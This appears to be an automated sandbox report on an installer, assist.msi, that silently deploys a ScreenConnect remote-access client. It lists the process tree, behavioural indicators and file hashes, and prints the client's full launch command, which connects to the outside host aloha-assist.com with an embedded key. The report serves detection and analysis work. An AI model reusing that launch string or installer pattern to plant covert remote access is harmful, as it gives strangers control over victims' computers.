pid Process 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe 4708 ScreenConnect.WindowsClient.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1528 wrote to memory of 4456 1528 msiexec.exe 84 PID 1528 wrote to memory of 4456 1528 msiexec.exe 84 PID 1528 wrote to memory of 4456 1528 msiexec.exe 84 PID 4456 wrote to memory of 788 4456 MsiExec.exe 85 PID 4456 wrote to memory of 788 4456 MsiExec.exe 85 PID 4456 wrote to memory of 788 4456 MsiExec.exe 85 PID 1528 wrote to memory of 4232 1528 msiexec.exe 90 PID 1528 wrote to memory of 4232 1528 msiexec.exe 90 PID 1528 wrote to memory of 2888 1528 msiexec.exe 92 PID 1528 wrote to memory of 2888 1528 msiexec.exe 92 PID 1528 wrote to memory of 2888 1528 msiexec.exe 92 PID 1528 wrote to memory of 1368 1528 msiexec.exe 93 PID 1528 wrote to memory of 1368 1528 msiexec.exe 93 PID 1528 wrote to memory of 1368 1528 msiexec.exe 93 PID 3636 wrote to memory of 4708 3636 ScreenConnect.ClientService.exe 95 PID 3636 wrote to memory of 4708 3636 ScreenConnect.ClientService.exe 95 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\assist.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1840
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Registers COM server for autorun
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8F5FD35F527C4740277F6AE80BB52178 C2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8964.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240618281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
PID:788
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4232
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C1713AF4CE1EC87304AACC3614FA869A2⤵
- Loads dropped DLL
PID:2888
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C6ACDEB5F7CDF74D01026146E315FA89 E Global\MSI00002⤵
- Drops file in Windows directory
- Loads dropped DLL
PID:1368
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:1264
-
C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=aloha-assist.com&p=443&s=246490b7-13ac-4d7e-8249-aa9aa516f2a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBRXVM%2f0zYukVOauF8gEYOCB0rCvmoWG%2bh46z7gQzdgnkGPtzjrebucQeKkm8qsbi5X0y0VsCHHG1XEDoURZH95JQnNkl%2f3tx3ViglzRdDhOa%2b5Nfob4XRPDBxwODOgX4IJZZJO3AnA9MX3RLhFapfmPCQjDYCbUowQ9cTiAObWHp4Se5EEf%2fbuvrXFiEwGau1ceiB0nuVtY9s%2fbxbyQSqiQywHYIBKc0MEgkS7EZelWCymok5wktn1Sf2vX9lSb7Lyyz7OV%2bQnrz%2fkwJjI84r5xQ0j1TRd8AYaN%2bL6KVUI0SZiP4mh5T2%2b08pFoKrPy02ScVcoQtd9Ht9fOnigbfav&c=admin1&c=&c=&c=&c=&c=&c=&c="1⤵
- Sets service image path in registry
- Drops file in System32 directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsClient.exe" "RunRole" "2662d516-2928-4e4d-bbf4-bddd1c74090a" "User"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4708
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
213KB
MD556abfe7df8f689139a2b1f5dcc0c96a2
SHA1d389ce01b5a33c73da0bc3fa48b25fa4ebc93e0e
SHA2563249a7ea0aaeb7a1e52fd61a122db7917f625bd77e085dd9f9a44c531764aefc
SHA51236780dd0a1c0f9fdf5221d7e059811daf3c883691f3dd900ae887a9bb56927394f357b7b41f772f1c8b8516dee932f8ba2956d773115bec02b34e52df5bbf27e
-
Filesize
47KB
MD5e5d912067630d3efe53f290b9c9d0d27
SHA1b0fc2105716c6eab770f89b9ed88ce2a36bdb5b2
SHA256a023527e773b886fb64c5f31de484f659c5816cf4ab696be7c98a3ea4de57d41
SHA51213fcb0f3f0208c072c86f1df8efe73cfade2803bc4b04e666787a95e10f49289fe6c1b8e10e7dbb5071cae92345fa12139fc220dc23dee4b098cc77fc53a316b
-
Filesize
26KB
MD55cd580b22da0c33ec6730b10a6c74932
SHA10b6bded7936178d80841b289769c6ff0c8eead2d
SHA256de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787
-
Filesize
177KB
MD532d230704c43f4bf811ce214fa23700b
SHA187c48d902f206c196ed6b69747f2ff1ec401a969
SHA2563b0cd76c1d949d6d6e4073c73e637c531bac18827f9ec02a6be6c5e6bbcfe368
SHA512cda6fbd99180f590658b47a418e28c6456dc298f14a7c1aa229a6fd97355dc6caa9278659d2d885cee1000298f54556f16ef359990d9f3b31fd01293adb8efa1
-
Filesize
58KB
MD5b1346a9380086791abef5aa98903c80e
SHA1ce77b0812363223bb04bfee60d383987ca405225
SHA25643bbdb1c62d021a137e51cfb23241d3765089f98042e2a12a0b1449647290135
SHA512a28b593bdaeb8e742d0c009cf2b7c60c8f25bccc7d824ed18e37be9b797946c3539f9fc12f0c74e6ccf28114936d77b2dd0fee6b08697c72741c4d6149f24b1d
-
Filesize
93KB
MD5256081d2d140ed2727c1957317627136
SHA16c0b6758aef7980868e56a0739c877d4fa837ed9
SHA25672b206d8c2ea0378f096c5e7c13022f67a0a0f670a10c1534b6f7a1ba95e8be6
SHA51240d15bfab3fcac4c1a5f9ebf4618982f600a00659e48a8bc1e7d5223852a2b6c1f047e17d93dd5545c9d8af11f943f243392f7db44ba993345e15e106a7246f0
-
Filesize
1.6MB
MD5254d64388c6c52228d7a921960a03f6b
SHA1b023b69348bb06c4b4ad67bee0f55bb9cfb3748c
SHA25605e78416a344f74095e36ff14baa719867e9e163e1ae9a96c29df8615748b0ae
SHA5122c52f6627fd1592f7e38b82f3a2d199fbed7b27268d9251b855fe2310d757d7b98db5a0e56956612794d6fce8035d30a6b9cecbd1262c570f0c01430e6e11459
-
Filesize
561KB
MD5254a33ec9d5391577b95d2cea3cf06d8
SHA1a23587d95e94d7d5222b675867b3d525c2b4db5f
SHA2566bd3ab0299b3826e476461caf1244e672d9f12858243921beb3939134618b790
SHA512e9a7550678d11b86032869a888bef1fe75d89eb895ae561937a26a6b364fa78f5903c53ad0ee74bdb2e235baa5570b16cfa97133e060ceb3033d469f62712bb6
-
C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsClient.exe.config
Filesize266B
MD5728175e20ffbceb46760bb5e1112f38b
SHA12421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA25687c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7
-
C:\Program Files (x86)\ScreenConnect Client (12e6ae703360b1e5)\ScreenConnect.WindowsCredentialProvider.dll
Filesize746KB
MD5f01a59c5cf7ec437097d414d7c6d59c4
SHA19ea1c3fbf3b5adbe5a23578dea3b511d44e6a2dd
SHA25662b405f32a43da0c8e8ed14a58ec7b9b4422b154bfd4aed4f9be5de0bc6eb5e8
SHA512587748ad4dd18677a3b7943eab1c0f8e77fe50a45e17266ba9a0e1363eda0ff1eabcf11884a5d608e23baf86af8f011db745ad06bcdecdfd01c20430745fe4bb
-
Filesize
1KB
MD55fdc2cfa0c47337d707ab781e167b333
SHA1b264dabe8cdb1261315154b8812fd21276ad372a
SHA2568a31d61e07cdf19181c20918e66209d22b1364f73dcc5ed793373ad6d9aae177
SHA5124b6c310cdfe961947010ca5cef0df61988124b754c1876ea188cca8982b50dbc7d59c0dbf2f7c4ee62415d95f36df1ba279e7630a5c34d73f1749047cc03e14a
-
Filesize
941B
MD564918732e3bc6c92c79533c570e8d55b
SHA178b5f5f8f2d95880d42e06306fdf93b65e75eada
SHA256bef498ec2a76fae9d3caf239406cd4d880f34982c5cbdd3b6d6378af4462a942
SHA5127856e5ff573d251fb1356c8bc6331555555c0bebf86a83a0a93a323aedff9e6b8c4f331bcc4a6074bf5f546153ae74634eb590f80f4d89226869db99d640ca4b
-
Filesize
1.0MB
MD58a9bfe7a382fbe927cfe4649e0a416f9
SHA18889cbcabe01478e90dfff1ccb74f89e01709304
SHA2560f216a5b1b84137bfd24c55f5e39ea5539b13452bc9b933572e8017551563493
SHA512b50c6429e1a5d20470e53f62666e2e07d8e8771163a82ec6e846cd62ff3c8dbf25672d605aef2941f4661ec51bfeb6ccdaebd5148438c80d9cf474c3ec71280f
-
Filesize
172KB
MD55ef88919012e4a3d8a1e2955dc8c8d81
SHA1c0cfb830b8f1d990e3836e0bcc786e7972c9ed62
SHA2563e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d
SHA5124544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684
-
Filesize
489KB
MD56c5d0928642bf37ceed295b984e05be2
SHA146be0d5a7db56cb1ad77274709d0db053a3c0999
SHA2563b0c45370ca9295881ef5e9d14402c42dfb45803f54d542e6a7e595a05f365a1
SHA512bb95297e937dcf689ea9a02f487f55bebf3d6766a0aa75ffdbc932638717e79719f88787a325550d660af5856c3620cb1c6d165bbb9af87bd74af1f30e23c19b
-
Filesize
21KB
MD5cbb8bdc4b5ba00ef9b1ba60396cd6250
SHA1840c6b1346061425a95be9f7bdbc9a12a61b5326
SHA256c135cc9a4c96c1014c45a3fb0e470a74e9c9af991da0d271039008ad3ea30a8e
SHA51235ac5651e445ac5552f8b2f5ba808c350810dec05ca7214c50d03ed420fdb07485dfa6c7f9d1902a81a404b8212f755f0a03e2e0825f3baea7f0415f2c64a8be
-
Filesize
202KB
MD5ba84dd4e0c1408828ccc1de09f585eda
SHA1e8e10065d479f8f591b9885ea8487bc673301298
SHA2563cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA5127a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290
-
Filesize
2.8MB
MD50c61143cdd787c28fa456b33834d1513
SHA156a157b6081b5f21b9b7f637c2de98558062485c
SHA256ab17098a430aacf82f5c33d5cb6156f23525623815eb63fbc0e969cb38b59fea
SHA51202f2fce34bdd9db6c51b2b4466c95270c6d94d80e76153fcd7bb6233653e86f9f9b16abb29c86b7b5ce69daeaf99e75abf04025bd7bc4ed95caa5e1f0d978b74
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\2bccoo55.newcfg
Filesize566B
MD5afaad3a5fe3845b66208517b483160d6
SHA1d957630aed555b0be67e9396823f3966baf2bfc3
SHA256ba6262bca66f1c47aa99feb669ea17e28e3664874aef34c171905857d9d6354b
SHA5124dba180f18d965f4ba974af30caee1abedb40ebbc492e710d2e8f30ca346cd01bf5e2f8e1959917f25cf3b8a795a795e03a013a43114f506e71229c8f9fc5208
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\o0dk22lm.newcfg
Filesize566B
MD5cdd2d687c4a134778b48f9ba3deee1cf
SHA19cc7b3309ff9f73d78c18a0e920f7ca735a96b58
SHA256ffb8e4216655d509292f25d013c1f0bb17766fa8eb5ba4c048d2a9981fc33cd4
SHA512d8b50e6b88ca8a59199e4421a2b163faa8c8bd1f8a612d2cf152344e44e71e0003599024b42ba549a4a729d8cc7202b236b54d1d3b41bdd2ec1d76a21733268a
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\user.config
Filesize566B
MD5bf0a32394c63654130a5e376e8222942
SHA1b9b4c007864d11d400b2760a83995504a42aac97
SHA2561032113687c5346dbda72ad73e24d7c9cf800f374b70d6deeeae6e993e31bcc6
SHA5129345425be746c368004b1fef0c7b1cc7bddf515fd7347eb4070d73cacccdf6cd32d4b3d2267271244d8077dd80c86eb8c0d2bb3b07627593aa0ed4d068989d63
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\user.config
Filesize566B
MD5eb08e84aa5933f4c31a231f412e5776d
SHA1b87e20151b56c40637a933a413e7c18080a5b77a
SHA25666f612ccfed0d33e089846d7a344c3b33ab07b45b20964ed271e0f54d4da9eb4
SHA51243d820baf5c6092521b70ec1b32c8ba8e49ed1c2835a64ce05735bf7cf564c523b07fa3fee62bb6d93eec7dc53a77e10c10b7bd23fb7f2ff1f6ec07b206b1516
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (12e6ae703360b1e5)\user.config
Filesize566B
MD5989bd33680444ee1d18e4d2ab314d843
SHA105e78e8e708321e519bab97ca491875f8ee9a213
SHA25634bf71ff86329da3e42261a2fd39f70bd0c010f7200daa21cb8c2e080a7b5c2c
SHA5127deca5e6107b364fba3a6f28bbfd61bf4a97f5919fc1fb806527a00949c87b44bc5239022c286b703bb57ae0de57bf73f33fba0bc03d2214cc052e6610ea9440
-
Filesize
12.8MB
MD5c121c7fe89a0ba6c0ebc42fe614c5f4e
SHA1c154c0d494db79960e2de5d8194fa28e14fb5516
SHA25689ae8223abc654901a2a408b76c7607cae0a42713f68f4303f9ab57f363e80f0
SHA512e91b096917dcd41dac21da3e8fb04984dac7353a0beb4b1bcdc51db9b44536a74b6bab75bc4a780a38e3594dcd14de881c5a0909a86392e72ce89891c19fe190
-
\??\Volume{7a15c5d7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c77830e6-26ac-42a2-93ed-176a24639126}_OnDiskSnapshotProp
Filesize6KB
MD54a47216b71c44aa118d26fe5709822cb
SHA18e0fd3f4312c4a5b67e9f0bbbd4cae9d3673db77
SHA2560b30ee87ee259113bad0c1ce3a734b6a7c4307c5bdff37dc67d55ef11e01d139
SHA512cdace687e84e50a572b779ed62857abb0f121f9bee76805136c0a5212f2b62036c8045b7faa861eef6216eacde8d6ceeb75574ea602b08816af6ddf5cb8c25ce